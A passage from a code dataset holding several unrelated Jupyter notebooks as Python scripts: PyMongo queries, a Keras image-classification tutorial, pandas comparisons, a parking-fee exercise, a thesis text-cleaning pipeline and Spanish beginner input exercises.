model to fit the Data R2 score of test model is 95.15\n\n\n","repo_name":"geeta2301/Practice-project","sub_path":"Students_grades_project.ipynb","file_name":"Students_grades_project.ipynb","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"72882723275","text":"# ## 1. Accessing MongoDB Database and printing database names\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndbs = client.list_database_names()\nfor i in dbs:\n print(i)\nclient.close()\n# -\n\n# ## 2. Printing collections from within the database\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\ndb.list_collection_names()\n# -\n\n# ## 3. Inserting Data\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\nresult = coll.insert_one({'name': 'hello', 'qty':321})\nprint(result.inserted_id)\n\n# +\nimport json\nfrom pymongo import MongoClient\n\nmyfile = open(r'Restaurants\\intern.json','r')\n\nfileLines= myfile.readlines()\nfileString = ''\n\nfor i in fileLines:\n i.strip('\\n')\n i.strip('\\t')\n fileString += i\n\ninternDictionary = json.loads(fileString)\ninternDictionary = internDictionary['intern_details']\n\nprint(internDictionary)\n\nprint(type(internDictionary))\n\nclient = MongoClient('localhost', 27017)\ndb = client['test_info']\ncoll = db['person']\nx = coll.insert_many(internDictionary)\nprint(x.inserted_ids)\n# -\n\n# ## 4. Data Querying\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient(\"localhost\", 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\nquery = {'name':{'$regex':'an'}, 'qty':{'$gte':20}}\nquery = {'address.coords.0':1.3042}\nprojection ={'_id':0}\n\nx = coll.find(query, projection)\nfor i in x:\n print(i)\n# -\n\n# ## 5. Updating Data (Set)\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost',27017)\n\ndb = client['test_info']\nprint(db.list_collection_names())\ncoll = db['fruits']\n\nquery = {'name':'together'}\nproj = {'$set':{'name':'applebananatogether'}}\n\nx = coll.update_many(query, proj)\nprint(x.modified_count)\n# for i in x:\n# print(i)\n\n\nclient.close()\n# -\n\n# ## 6. Sorting\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\nquery = {'qty':{'$exists':True}, 'country':{'$exists':False}}\nproj = {'_id':0, 'address':0}\n\nx = coll.find(query, proj).sort('name',-1)\n# The negative 1 makes the sort sorted in reverse alphabetical\nfor i in x:\n print(i)\n\n# +\nfrom pymongo import MongoClient\nclient = MongoClient('localhost', 27017)\n\ndb = client['test_info']\ncoll = db['fruit']\n\n#remember thisssssss\nquery = {'$or':[{'name':'hello'}, {'name':'durian'}]}\nquery = {'name':{'$in':['hello', 'orange']}}\nquery = {'name':{'$in':['hello', 'orange']}}\nquery = {\"qty\":{\"$not\":{\"$gt\":10}}}\n\nprojection = {'_id':0}\n\nx = coll.find(query, projection)\nfor i in x: \n print(i)\n# -\n\n# ## 7. Misc:\n\n# +\n# useful one-liner python scripts\nwith open('test.txt', 'r') as file: lines = file.readlines()\nlines = [i.strip('\\n') for i in lines]\nprint(lines)\n\nalphabets = [chr(i) for i in range(65,91)]\nprint(alphabets)\n","repo_name":"darentanrw/h2computing-public","sub_path":"6. NoSQL (PyMongo)/Pymongo Detailed Revision v2.ipynb","file_name":"Pymongo Detailed Revision v2.ipynb","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"36006245119","text":"# + id=\"L1WtoaOHVrVh\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport PIL\nimport tensorflow as tf\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\n\n# + [markdown] id=\"xyDNn9MbIzfT\"\n# ### Create a dataset\n\n# + [markdown] id=\"anqiK_AGI086\"\n# Define some parameters for the loader:\n\n# + id=\"H74l2DoDI2XD\"\nbatch_size = 32\nimg_height = 180\nimg_width = 180\ndata_dir = './Imgs/'\n\n# + [markdown] id=\"pFBhRrrEI49z\"\n# It's good practice to use a validation split when developing your model. Use 80% of the images for training and 20% for validation.\n\n# + id=\"fIR0kRZiI_AT\"\ntrain_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir+'train',\n # validation_split=0.2,\n # subset=\"training\",\n # seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n# + id=\"iscU3UoVJBXj\"\nval_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir+'val',\n # validation_split=0.2,\n # subset=\"validation\",\n # seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n# -\n\ntest_ds = tf.keras.utils.image_dataset_from_directory(\n data_dir+'test',\n # validation_split=0.2,\n # subset=\"validation\",\n # seed=123,\n image_size=(img_height, img_width),\n batch_size=batch_size)\n\n# + [markdown] id=\"WLQULyAvJC3X\"\n# You can find the class names in the `class_names` attribute on these datasets. These correspond to the directory names in alphabetical order.\n\n# + id=\"ZHAxkHX5JD3k\"\nclass_names = train_ds.class_names\nprint(class_names)\n\n# + [markdown] id=\"_uoVvxSLJW9m\"\n# ## Visualize the data\n#\n# Here are the first nine images from the training dataset:\n\n# + id=\"wBmEA9c0JYes\"\nimport matplotlib.pyplot as plt\n\nplt.figure(figsize=(10, 10))\nfor images, labels in train_ds.take(1):\n for i in range(9):\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(images[i].numpy().astype(\"uint8\"))\n plt.title(class_names[labels[i]])\n plt.axis(\"off\")\n\n# + [markdown] id=\"5M6BXtXFJdW0\"\n# You will pass these datasets to the Keras `Model.fit` method for training later in this tutorial. If you like, you can also manually iterate over the dataset and retrieve batches of images:\n\n# + id=\"2-MfMoenJi8s\"\nfor image_batch, labels_batch in train_ds:\n print(image_batch.shape)\n print(labels_batch.shape)\n break\n\n# + [markdown] id=\"Wj4FrKxxJkoW\"\n# The `image_batch` is a tensor of the shape `(32, 180, 180, 3)`. This is a batch of 32 images of shape `180x180x3` (the last dimension refers to color channels RGB). The `label_batch` is a tensor of the shape `(32,)`, these are corresponding labels to the 32 images.\n#\n# You can call `.numpy()` on the `image_batch` and `labels_batch` tensors to convert them to a `numpy.ndarray`.\n#\n\n# + [markdown] id=\"4Dr0at41KcAU\"\n# ## Configure the dataset for performance\n#\n# Make sure to use buffered prefetching, so you can yield data from disk without having I/O become blocking. These are two important methods you should use when loading data:\n#\n# - `Dataset.cache` keeps the images in memory after they're loaded off disk during the first epoch. This will ensure the dataset does not become a bottleneck while training your model. If your dataset is too large to fit into memory, you can also use this method to create a performant on-disk cache.\n# - `Dataset.prefetch` overlaps data preprocessing and model execution while training.\n#\n# Interested readers can learn more about both methods, as well as how to cache data to disk in the *Prefetching* section of the [Better performance with the tf.data API](../../guide/data_performance.ipynb) guide.\n\n# + id=\"nOjJSm7DKoZA\"\nAUTOTUNE = tf.data.AUTOTUNE\n\ntrain_ds = train_ds.cache().shuffle(1000).prefetch(buffer_size=AUTOTUNE)\nval_ds = val_ds.cache().prefetch(buffer_size=AUTOTUNE)\ntest_ds = test_ds.cache().prefetch(buffer_size=AUTOTUNE)\n\n# + [markdown] id=\"8GUnmPF4JvEf\"\n# ## Standardize the data\n\n# + [markdown] id=\"e56VXHMWJxYT\"\n# The RGB channel values are in the `[0, 255]` range. This is not ideal for a neural network; in general you should seek to make your input values small.\n#\n# Here, you will standardize values to be in the `[0, 1]` range by using `tf.keras.layers.Rescaling`:\n\n# + id=\"PEYxo2CTJvY9\"\nnormalization_layer = layers.Rescaling(1./255)\n\n# + [markdown] id=\"Bl4RmanbJ4g0\"\n# There are two ways to use this layer. You can apply it to the dataset by calling `Dataset.map`:\n\n# + id=\"X9o9ESaJJ502\"\nnormalized_ds = train_ds.map(lambda x, y: (normalization_layer(x), y))\nimage_batch, labels_batch = next(iter(normalized_ds))\nfirst_image = image_batch[0]\n# Notice the pixel values are now in `[0,1]`.\nprint(np.min(first_image), np.max(first_image))\n\n# + [markdown] id=\"XWEOmRSBJ9J8\"\n# Or, you can include the layer inside your model definition, which can simplify deployment. Use the second approach here.\n\n# + [markdown] id=\"XsRk1xCwKZR4\"\n# Note: You previously resized images using the `image_size` argument of `tf.keras.utils.image_dataset_from_directory`. If you want to include the resizing logic in your model as well, you can use the `tf.keras.layers.Resizing` layer.\n\n# + [markdown] id=\"hO_jT7HwMrEn\"\n# The plots show that training accuracy and validation accuracy are off by large margins, and the model has achieved only around 60% accuracy on the validation set.\n#\n# The following tutorial sections show how to inspect what went wrong and try to increase the overall performance of the model.\n\n# + [markdown] id=\"hqtyGodAMvNV\"\n# ## Overfitting\n\n# + [markdown] id=\"ixsz9XFfMxcu\"\n# In the plots above, the training accuracy is increasing linearly over time, whereas validation accuracy stalls around 60% in the training process. Also, the difference in accuracy between training and validation accuracy is noticeable—a sign of [overfitting](https://www.tensorflow.org/tutorials/keras/overfit_and_underfit).\n#\n# When there are a small number of training examples, the model sometimes learns from noises or unwanted details from training examples—to an extent that it negatively impacts the performance of the model on new examples. This phenomenon is known as overfitting. It means that the model will have a difficult time generalizing on a new dataset.\n#\n# There are multiple ways to fight overfitting in the training process. In this tutorial, you'll use *data augmentation* and add *dropout* to your model.\n\n# + [markdown] id=\"BDMfYqwmM1C-\"\n# ## Data augmentation\n\n# + [markdown] id=\"GxYwix81M2YO\"\n# Overfitting generally occurs when there are a small number of training examples. [Data augmentation](./data_augmentation.ipynb) takes the approach of generating additional training data from your existing examples by augmenting them using random transformations that yield believable-looking images. This helps expose the model to more aspects of the data and generalize better.\n#\n# You will implement data augmentation using the following Keras preprocessing layers: `tf.keras.layers.RandomFlip`, `tf.keras.layers.RandomRotation`, and `tf.keras.layers.RandomZoom`. These can be included inside your model like other layers, and run on the GPU.\n\n# + id=\"9J80BAbIMs21\"\ndata_augmentation = keras.Sequential(\n [\n layers.RandomFlip(\"horizontal\",\n input_shape=(img_height,\n img_width,\n 3)),\n layers.RandomRotation(0.1),\n layers.RandomZoom(0.1),\n ]\n)\n\n# + [markdown] id=\"PN4k1dK3S6eV\"\n# Visualize a few augmented examples by applying data augmentation to the same image several times:\n\n# + id=\"7Z90k539S838\"\nplt.figure(figsize=(10, 10))\nfor images, _ in train_ds.take(1):\n for i in range(9):\n augmented_images = data_augmentation(images)\n ax = plt.subplot(3, 3, i + 1)\n plt.imshow(augmented_images[0].numpy().astype(\"uint8\"))\n plt.axis(\"off\")\n\n# + [markdown] id=\"tsjXCBLYYNs5\"\n# You will add data augmentation to your model before training in the next step.\n\n# + [markdown] id=\"ZeD3bXepYKXs\"\n# ## Dropout\n#\n# Another technique to reduce overfitting is to introduce [dropout](https://developers.google.com/machine-learning/glossary#dropout_regularization){:.external} regularization to the network.\n#\n# When you apply dropout to a layer, it randomly drops out (by setting the activation to zero) a number of output units from the layer during the training process. Dropout takes a fractional number as its input value, in the form such as 0.1, 0.2, 0.4, etc. This means dropping out 10%, 20% or 40% of the output units randomly from the applied layer.\n#\n# Create a new neural network with `tf.keras.layers.Dropout` before training it using the augmented images:\n\n# + id=\"2Zeg8zsqXCsm\"\n\nclass_names = train_ds.class_names\nnum_classes = len(class_names)\nmodel = Sequential([\n data_augmentation,\n layers.Rescaling(1./255),\n layers.Conv2D(16, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(32, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Conv2D(64, 3, padding='same', activation='relu'),\n layers.MaxPooling2D(),\n layers.Dropout(0.2),\n layers.Flatten(),\n layers.Dense(128, activation='relu'),\n layers.Dense(num_classes, name=\"outputs\")\n])\n\n# + [markdown] id=\"L4nEcuqgZLbi\"\n# ## Compile and train the model\n\n# + id=\"EvyAINs9ZOmJ\"\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\n# + id=\"wWLkKoKjZSoC\"\nmodel.summary()\n\n# + id=\"LWS-vvNaZDag\"\nepochs = 15\nhistory = model.fit(\n train_ds,\n validation_data=val_ds,\n epochs=epochs\n)\n\n# + [markdown] id=\"Lkdl8VsBbZOu\"\n# ## Visualize training results\n#\n# After applying data augmentation and `tf.keras.layers.Dropout`, there is less overfitting than before, and training and validation accuracy are closer aligned:\n\n# + id=\"dduoLfKsZVIA\"\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs_range = range(epochs)\n\nplt.figure(figsize=(8, 8))\nplt.subplot(1, 2, 1)\nplt.plot(epochs_range, acc, label='Training Accuracy')\nplt.plot(epochs_range, val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.title('Training and Validation Accuracy')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs_range, loss, label='Training Loss')\nplt.plot(epochs_range, val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.title('Training and Validation Loss')\nplt.show()\n\n# + [markdown] id=\"dtv5VbaVb-3W\"\n# ## Predict on new data\n\n# + [markdown] id=\"10buWpJbcCQz\"\n# Use your model to classify an image that wasn't included in the training or validation sets.\n\n# + [markdown] id=\"NKgMZ4bDcHf7\"\n# Note: Data augmentation and dropout layers are inactive at inference time.\n\n# + id=\"dC40sRITBSsQ\"\n# sunflower_url = \"https://storage.googleapis.com/download.tensorflow.org/example_images/592px-Red_sunflower.jpg\"\n# sunflower_path = tf.keras.utils.get_file('Red_sunflower', origin=sunflower_url)\n\n# img = tf.keras.utils.load_img(\n# sunflower_path, target_size=(img_height, img_width)\n# )\n# img_array = tf.keras.utils.img_to_array(img)\n# img_array = tf.expand_dims(next(iter(test_ds)), 0) # Create a batch\n# img_array\n\npredictions = model.predict(test_ds)\nscore = tf.nn.softmax(predictions[0])\n\nprint(\n \"This image most likely belongs to {} with a {:.2f} percent confidence.\"\n .format(class_names[np.argmax(score)], 100 * np.max(score))\n)\n","repo_name":"Namasivaayam-L/DeepLearningLab","sub_path":"5Ex/Refs/classification.ipynb","file_name":"classification.ipynb","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"5945487133","text":"# +\nimport pandas as pd\nimport numpy as np\n\nprint(pd.__version__)\nprint(np.__version__)\n# -\n\n# NaN adalah missing value\ndata = {'A':[15,15,18,np.nan,12],\n 'B':[15,15,18,np.nan,12]}\ndf = pd.DataFrame(data)\ndf\n\ndf['A']\n\n#setiap kolom pada pandas adalah type data series (1 dimensi), sedangkan kumpulan series adalah dataframe.\ntype(df['A'])\n\ntype(df)\n\n#tidak disarankan\n#membandingkan antar series atau kolom\ndf['A'] == df['B']\n\n#disarankan\ndf['A'].equals(df['B'])\n\n# +\n#membandingkan antar dataframe\ndf1 = df.copy(deep=True)\n\ndf.equals(df1)\n# -\n\ndf == df1\n\n\n","repo_name":"MuhFaridanSutariya/learn-pandas","sub_path":"07 compare each column and dataframe.ipynb","file_name":"07 compare each column and dataframe.ipynb","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"16582360367","text":"# +\nimport math\n\ndef change(t):\n tt,mi = t.split(\":\")\n tmp = int(tt)*60 + int(mi)\n return tmp\n\ndef solution(fees, records):\n\n dic1 = {}\n result = []\n aa = []\n\n for record in records:\n time,num,condi = record.split()\n dic1[num] = []\n\n for record in records:\n time,num,condi = record.split()\n dic1[num].append((time,condi))\n\n for i in sorted(list(dic1.items())):\n temp = 0\n if len(i[1]) % 2 == 0:\n for j in range(0,len(i[1]),2):\n temp += change(i[1][j+1][0]) - change(i[1][j][0])\n aa.append(temp)\n else:\n for k in range(0,len(i[1][:-1]),2):\n temp += change(i[1][k+1][0]) - change(i[1][k][0])\n temp += 1439 - change(i[1][-1][0])\n aa.append(temp)\n\n for a in aa:\n if a <= fees[0]:\n result.append(fees[1])\n else:\n temp_ = fees[1] + math.ceil((a-fees[0])/fees[2]) * fees[3]\n result.append(temp_)\n return result\n","repo_name":"886814/Algorithm","sub_path":"2022 카카오 블라인드/주차 요금 계산.ipynb","file_name":"주차 요금 계산.ipynb","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"12777255840","text":"import time\nstart_time = time.time()\n\n# Import needed packages\nimport os\nimport pandas as pd\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nfrom sklearn.preprocessing import KBinsDiscretizer\nimport seaborn as sns; sns.set()\nimport glob\nfrom sklearn.linear_model import LinearRegression\nfrom statsmodels.formula.api import ols\nimport re\nimport nltk\nfrom langdetect import detect\nfrom sklearn import feature_extraction, model_selection, naive_bayes, pipeline, manifold, preprocessing\nfrom lime import lime_text\nimport gensim\nimport gensim.downloader as gensim_api\nfrom tensorflow.keras import models, layers, preprocessing as kprocessing\nfrom tensorflow.keras import backend as K\nimport transformers\nplt.style.use('seaborn-whitegrid')\nsns.set_style(\"whitegrid\")\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.stem.snowball import EnglishStemmer\nimport spacy\nfrom spacy import displacy\nfrom wordcloud import WordCloud\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom nbpep8.nbpep8 import pep8\n\n\n# # 1. Load the data\n\n#Set the working directory\nos.chdir('C:\\\\Users\\\\piotr\\\\OneDrive - Erasmus University Rotterdam\\\\Thesis\\\\')\n# #Load the data\nmerged_df = pd.read_csv('Master Thesis Data\\\\merged_df.csv')\n\n# Possible speed improvements \n#\n# - drop the longest questions\n#\n# - drop the columns that are not needed (answer body)\n\n# ## 1.1 Create text df with Post_Body only\n\n# +\n# ## Create text df with Post_Body and index only\n# text_df = merged_df[['Post_Body']]\n\n# +\n# text_df.to_csv('Master Thesis Data\\\\text_df.csv', index=True)\n\n# +\n# ## Create unprocessed_df with other columns than Post_Body\n# unprocessed_df = merged_df.drop(['Post_Body'], axis=1)\n\n# +\n# unprocessed_df.to_csv('Master Thesis Data\\\\unprocessed_df.csv', index=True)\n# -\n\n#Read the text_df\ntext_df = pd.read_csv('Master Thesis Data\\\\text_df.csv')\n\n#Read the unprocessed_df\nunprocessed_df = pd.read_csv('Master Thesis Data\\\\unprocessed_df.csv')\n\n\n# +\n# #See if the data frames can be merged\n# validation_df = pd.merge(text_df, unprocessed_df, on='Unnamed: 0')\n# -\n\n# ## 2. Remove the html tags and other chunks of code\n\n# Remove the html tags and the content between them\n\ndef remove_code(x):\n \"\"\"Function based on the Beautifulsoup library intended to replace \n the content of all the tags of a text specified as a parameter.\n\n Parameters\n ----------------------------------------\n x : string\n Sequence of characters to modify.\n ----------------------------------------\n \"\"\"\n soup = BeautifulSoup(x,\"lxml\")\n code_to_remove = soup.findAll(\"code\")\n for code in code_to_remove:\n code.replace_with(\" \")\n return str(soup)\n\n\n# The data set is too large to be processed at once, so it will be processed in chunks \n\n# +\nchunksize = 10 ** 4\nfirst_one = True\nfilepath = os.path.join('Master Thesis Data', 'text_df.csv') \n\nfor chunk in pd.read_csv(filepath, chunksize=chunksize):\n chunk.loc[:, 'Post_Body'] = chunk['Post_Body'].apply(remove_code)\n chunk.loc[:, 'Post_Body'] = chunk['Post_Body'].apply(lambda x: BeautifulSoup(x, \"lxml\").get_text())\n \n # If it's the first chunk we're processing, we want to write to a new file with the header\n if first_one:\n chunk.to_csv('Master Thesis Data\\\\text_df_clean.csv', mode='w', index=False)\n first_one = False\n # Otherwise, we want to append to the existing file, and we don't want to write the header again\n else:\n chunk.to_csv('Master Thesis Data\\\\text_df_clean.csv', mode='a', index=False, header=False)\n\n# -\n\ntext_df_clean.shape\n\n#Read text_df_clean\ntext_df_clean = pd.read_csv('Master Thesis Data\\\\text_df_clean.csv')\n\n# +\n# #Load the data again after removing code\n# merged_df = pd.read_csv('Master Thesis Data\\\\merged_df_clean.csv')\n# -\n\n# ## 3. Remove languages other than English\n\n# Now we need to check whether the texts of the questions are written in different languages. \n\n# +\n# merged_df['Post_Body']\n\n# +\n# Create feature \"lang\" with langdetect library\nfrom langdetect import detect\n\ndef detect_lang(x):\n try:\n return detect(x)\n except:\n return 'unknown' # instead of pass\n\n\n# +\nimport pandas as pd\nimport os\nimport time\nfrom bs4 import BeautifulSoup\nfrom langdetect import detect\n\nchunksize = 10 ** 5\nfirst_one = True\nstart_chunk = 28 # 0-indexed, adjust this to the chunk where you want to start\n\ninput_filepath = os.path.join('Master Thesis Data', 'text_df_clean.csv') \noutput_filepath = os.path.join('Master Thesis Data', 'text_df_clean_3.csv') # output to a new file\n\n# Get the total number of rows in the file\ntotal_rows = sum(1 for row in open(input_filepath)) - 1 # Subtract 1 to account for the header\n\nstart = time.time()\n\nskiprows = range(1, start_chunk * chunksize + 1) # Calculate the rows to skip based on the start_chunk\n\nfor i, chunk in enumerate(pd.read_csv(input_filepath, skiprows=skiprows, chunksize=chunksize, header=0)):\n chunk.loc[:,'short_Post_Body'] = chunk['Post_Body'].apply(lambda x: x[0:100] if isinstance(x, str) else x)\n chunk.loc[:,'lang'] = chunk['short_Post_Body'].apply(detect_lang)\n \n # If it's the first chunk we're processing, we want to write to a new file with the header\n if first_one:\n chunk.to_csv(output_filepath, mode='w', index=False)\n first_one = False\n # Otherwise, we want to append to the existing file, and we don't want to write the header again\n else:\n chunk.to_csv(output_filepath, mode='a', index=False, header=False)\n \n # Estimate remaining time\n elapsed_time = time.time() - start\n rows_processed = chunksize * (i + 1)\n print(f\"Processed {rows_processed} rows in {elapsed_time:.2f} seconds.\")\n \n if rows_processed < total_rows:\n remaining_rows = total_rows - rows_processed\n remaining_chunks = -(-remaining_rows // chunksize) # Ceiling division\n estimated_time = (elapsed_time / rows_processed) * remaining_rows\n print(f\"Estimated remaining time: {estimated_time:.2f} seconds or approximately {estimated_time/60:.2f} minutes.\")\n\n# -\n\n#Read text_df_clean_2\ntext_df_clean_2 = pd.read_csv('Master Thesis Data\\\\text_df_clean_2.csv')\ntext_df_clean_2\n\n#Read text_df_clean_3\ntext_df_clean_3 = pd.read_csv('Master Thesis Data\\\\text_df_clean_3.csv')\ntext_df_clean_3\n\n#Concatenate text_df_clean_2 and text_df_clean_3\ntext_df_clean_2 = pd.concat([text_df_clean_2, text_df_clean_3], axis=0)\ntext_df_clean_2\n\npd.DataFrame(text_df_clean_2.lang.value_counts())\n\n# The majority of the posts are in English, so we are gonna remove posts in other languages. We lose only 134366 body texts\n\n#Number of posts in language other than English\nprint(3040730 - 2906364)\n\n# Deletion of data that is not in the English language\ntext_df_clean_2 = text_df_clean_2[text_df_clean_2['lang']=='en']\n\ntext_df_clean_2.shape\n\n#Drop the short_Post_Body and lang columns\ntext_df_clean_2 = text_df_clean_2.drop(['short_Post_Body', 'lang'], axis=1)\n\n#Write down text_df_clean_2\ntext_df_clean_2.to_csv('Master Thesis Data\\\\text_df_clean_2.csv', index=False)\n\n'''\nPreprocess a string.\n:parameter\n :param text: string - name of column containing text\n :param lst_stopwords: list - list of stopwords to remove\n :param flg_stemm: bool - whether stemming is to be applied\n :param flg_lemm: bool - whether lemmitisation is to be applied\n:return\n cleaned text\n'''\ndef utils_preprocess_text(text, flg_stemm=False, flg_lemm=True, lst_stopwords=None):\n ## clean (convert to lowercase and remove punctuations and \n #characters and then strip)\n text = re.sub(r'[^\\w\\s]', '', str(text).lower().strip())\n \n ## Tokenize (convert from string to list)\n lst_text = text.split()\n ## remove Stopwords\n if lst_stopwords is not None:\n lst_text = [word for word in lst_text if word not in \n lst_stopwords]\n \n ## Stemming (remove -ing, -ly, ...)\n if flg_stemm == True:\n ps = nltk.stem.porter.PorterStemmer()\n lst_text = [ps.stem(word) for word in lst_text]\n \n ## Lemmatisation (convert the word into root word)\n if flg_lemm == True:\n lem = nltk.stem.wordnet.WordNetLemmatizer()\n lst_text = [lem.lemmatize(word) for word in lst_text]\n \n ## back to string from list\n text = \" \".join(lst_text)\n return text\n\n\nlst_stopwords = nltk.corpus.stopwords.words(\"english\")\n\n# +\nimport pandas as pd\nimport os\nimport time\n\nchunksize = 10 ** 5\nfirst_one = True\n\ninput_filepath = os.path.join('Master Thesis Data', 'text_df_clean_2.csv') \noutput_filepath = os.path.join('Master Thesis Data', 'processed_df.csv') \n\n# Get the total number of rows in the file\ntotal_rows = sum(1 for row in open(input_filepath)) - 1 # Subtract 1 to account for the header\n\nstart = time.time()\n\nfor i, chunk in enumerate(pd.read_csv(input_filepath, chunksize=chunksize)):\n chunk['Post_Body_clean'] = chunk['Post_Body'].apply(lambda x: utils_preprocess_text(x, flg_stemm=False, flg_lemm=True, lst_stopwords=lst_stopwords))\n \n # If it's the first chunk we're processing, we want to write to a new file with the header\n if first_one:\n chunk.to_csv(output_filepath, mode='w', index=False)\n first_one = False\n # Otherwise, we want to append to the existing file, and we don't want to write the header again\n else:\n chunk.to_csv(output_filepath, mode='a', index=False, header=False)\n \n # Estimate remaining time\n elapsed_time = time.time() - start\n rows_processed = chunksize * (i + 1)\n print(f\"Processed {rows_processed} rows in {elapsed_time:.2f} seconds.\")\n \n if rows_processed < total_rows:\n remaining_rows = total_rows - rows_processed\n remaining_chunks = -(-remaining_rows // chunksize) # Ceiling division\n estimated_time = (elapsed_time / rows_processed) * remaining_rows\n print(f\"Estimated remaining time: {estimated_time:.2f} seconds or approximately {estimated_time/60:.2f} minutes.\")\n\n# -\n\n#read processed_df\nprocessed_df = pd.read_csv('Master Thesis Data\\\\processed_df.csv')\nprocessed_df\n\n# +\n# #drop Post_Body column\n# processed_df = processed_df.drop(['Post_Body'], axis=1)\n# -\n\n#merge processed_df with text_df (left join on Unnamed: 0)\ndf_clean = pd.merge(unprocessed_df, processed_df, on='Unnamed: 0', how='left')\n\ndf_clean\n\n# #Everything seems correct! Now we drop the column Unnamed: 0 can \n# df_clean = df_clean.drop(['Unnamed: 0'], axis=1)\n#save the df_clean\ndf_clean.to_csv('Master Thesis Data\\\\df_clean.csv', index=False)\n\nend_time = time.time()\ntotal_time = end_time - start_time\nprint(\"Total execution time: {:.2f} seconds\".format(total_time))\n","repo_name":"peterthebest444/Chatbot-Overflow---Piotr-Piwnik","sub_path":"Notebooks/Thesis_Code_2_Text_Cleaning.ipynb","file_name":"Thesis_Code_2_Text_Cleaning.ipynb","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"28"} +{"seq_id":"19853696185","text":"# + [markdown] id=\"5W3-5u8iMWxf\" colab_type=\"text\"\n# Punto Nº1:\n#\n# Realize un programa que permita ingresar por teclado 2 valores ('a' y 'b') y que se imprima por pantalla con el siguiente formato:\n#\n# \"Los valores ingresados fueron a y b\" ---> reemplazando a y b por sus valores ingresados\n#\n# Punto Nº2:\n#\n# Realize un programa que permita ingresar por teclado 2 valores enteros ('a' y 'b') y que se imprima por pantalla la suma con el siguiente formato:\n#\n# \"Los valores ingresados fueron 4 y 5, y la suma es: 9 \" ---> ( para el caso de que a=4 y b=5)\n#\n# Punto Nº3:\n#\n# Realize un programa que permita ingresar por teclado 3 valores enteros (a,b y c) e imprima por pantalla el valor mas grande con el siguiente formato:\n#\n# \"Los valores ingresados fueron 4 y 5 y 8, y el mayor fue: 8 \" --> (para el caso de que a=4, b=5 y c= 8)\n\n# + id=\"idCZ_a0cI5_R\" colab_type=\"code\" colab={}\n#Ejercicio N°1\na = input('Ingrese un valor para a ')\nb = input('Ingrese un valor para b ')\nprint('Los valores ingresados fueron '+ a +' y '+ b)\n\n# + id=\"vMANvXmSqqhl\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 231} outputId=\"9563d063-ec0a-4e35-8e39-310e120773f4\"\n#Ejercicio N2\na = int(input('Ingrese un valor entero para a '))\nb = int(input('Ingrese un valor entero para b '))\nprint('Los valores ingresados fueron ',a,' y ',b,',y la suma es: ',a+b)\n\n\n# + id=\"ipamc3ZZs8CD\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 85} outputId=\"d94f9e0f-df10-477b-ef82-5a1a5b8c5446\"\n#Ejercicio N2 (Que no se cierra cuando ingresas un valor que no es entero)\na = float(input('Ingrese un valor entero para a: '))\nc = a%1\nwhile(c!=0):\n a = float(input('No se ingresó un valor entero para a, vuelva a ingresar otro valor para a: '))\n c = a%1\na = int(a)\nb = float(input('Ingrese un valor entero para b: '))\nd = b%1\nwhile(d!=0):\n b = float(input('No se ingresó un valor entero para b, vuelva a ingresar otro valor para b: '))\n d = b%1\nb = int(b)\ne = a+b\nprint('Los valores ingresados fueron ',a,'y',b,',y la suma es:',e)\n\n# + id=\"hPRJC5jBrZaX\" colab_type=\"code\" colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 85} outputId=\"8f3e6a78-e5be-40c6-88a7-f86a20d556d4\"\n#Ejercicio N3\na = float(input('Ingrese un valor entero para a: '))\nd = a%1\nwhile(d!=0):\n a = float(input('No se ingresó un valor entero para a, vuelva a ingresar otro valor para a: '))\n d = a%1\na = int(a)\nmax = a\nb = float(input('Ingrese un valor entero para b: '))\ne = b%1\nwhile(e!=0):\n b = float(input('No se ingresó un valor entero para b, vuelva a ingresar otro valor para b: '))\n e = b%1\nb = int(b)\nif (b>max):\n max = b\nc = float(input('Ingrese un valor entero para c: '))\nf = 